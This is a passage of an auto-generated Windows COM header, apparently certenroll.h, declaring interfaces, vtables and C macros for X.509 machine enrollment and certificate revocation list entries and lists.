            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509MachineEnrollmentFactory * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper);
        
        END_INTERFACE
    } IX509MachineEnrollmentFactoryVtbl;

    interface IX509MachineEnrollmentFactory
    {
        CONST_VTBL struct IX509MachineEnrollmentFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509MachineEnrollmentFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509MachineEnrollmentFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509MachineEnrollmentFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509MachineEnrollmentFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509MachineEnrollmentFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509MachineEnrollmentFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509MachineEnrollmentFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509MachineEnrollmentFactory_CreateObject(This,strProgID,ppIHelper)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIHelper) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0091 */
/* [local] */ 

typedef 
enum CRLRevocationReason
    {
        XCN_CRL_REASON_UNSPECIFIED	= 0,
        XCN_CRL_REASON_KEY_COMPROMISE	= 1,
        XCN_CRL_REASON_CA_COMPROMISE	= 2,
        XCN_CRL_REASON_AFFILIATION_CHANGED	= 3,
        XCN_CRL_REASON_SUPERSEDED	= 4,
        XCN_CRL_REASON_CESSATION_OF_OPERATION	= 5,
        XCN_CRL_REASON_CERTIFICATE_HOLD	= 6,
        XCN_CRL_REASON_REMOVE_FROM_CRL	= 8,
        XCN_CRL_REASON_PRIVILEGE_WITHDRAWN	= 9,
        XCN_CRL_REASON_AA_COMPROMISE	= 10
    } 	CRLRevocationReason;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0091_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0091_v0_0_s_ifspec;

#ifndef __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__
#define __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationListEntry */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationListEntry;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35e-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationListEntry : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [in] */ DATE RevocationDate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RevocationDate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RevocationReason( 
            /* [retval][out] */ __RPC__out CRLRevocationReason *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RevocationReason( 
            /* [in] */ CRLRevocationReason Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListEntryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationListEntry * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationListEntry * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationListEntry * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [in] */ DATE RevocationDate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RevocationDate )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RevocationReason )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__out CRLRevocationReason *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RevocationReason )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ CRLRevocationReason Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListEntryVtbl;

    interface IX509CertificateRevocationListEntry
    {
        CONST_VTBL struct IX509CertificateRevocationListEntryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationListEntry_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationListEntry_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationListEntry_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationListEntry_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationListEntry_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationListEntry_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationListEntry_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationListEntry_Initialize(This,Encoding,SerialNumber,RevocationDate)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,SerialNumber,RevocationDate) ) 

#define IX509CertificateRevocationListEntry_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRevocationListEntry_get_RevocationDate(This,pValue)	\
    ( (This)->lpVtbl -> get_RevocationDate(This,pValue) ) 

#define IX509CertificateRevocationListEntry_get_RevocationReason(This,pValue)	\
    ( (This)->lpVtbl -> get_RevocationReason(This,pValue) ) 

#define IX509CertificateRevocationListEntry_put_RevocationReason(This,Value)	\
    ( (This)->lpVtbl -> put_RevocationReason(This,Value) ) 

#define IX509CertificateRevocationListEntry_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRevocationListEntry_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__
#define __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationListEntries */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationListEntries;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35f-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationListEntries : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntry **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntry *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexBySerialNumber( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntries *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListEntriesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationListEntries * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntry **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntry *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexBySerialNumber )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntries *pValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListEntriesVtbl;

    interface IX509CertificateRevocationListEntries
    {
        CONST_VTBL struct IX509CertificateRevocationListEntriesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationListEntries_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationListEntries_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationListEntries_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationListEntries_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationListEntries_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationListEntries_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationListEntries_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationListEntries_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509CertificateRevocationListEntries_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509CertificateRevocationListEntries_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509CertificateRevocationListEntries_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509CertificateRevocationListEntries_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509CertificateRevocationListEntries_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509CertificateRevocationListEntries_get_IndexBySerialNumber(This,Encoding,SerialNumber,pIndex)	\
    ( (This)->lpVtbl -> get_IndexBySerialNumber(This,Encoding,SerialNumber,pIndex) ) 

#define IX509CertificateRevocationListEntries_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRevocationList_INTERFACE_DEFINED__
#define __IX509CertificateRevocationList_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationList */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationList;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab360-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationList : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_HEXRAW) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Encode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ResetForEncode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckPublicKeySignature( 
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Issuer( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Issuer( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ThisUpdate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ThisUpdate( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NextUpdate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NextUpdate( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509CRLEntries( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntries **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CRLNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CRLNumber( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CAVersion( 
            /* [in] */ LONG pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BaseCRL( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawDataToBeSigned( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationList * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ThisUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ThisUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NextUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NextUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509CRLEntries )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntries **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
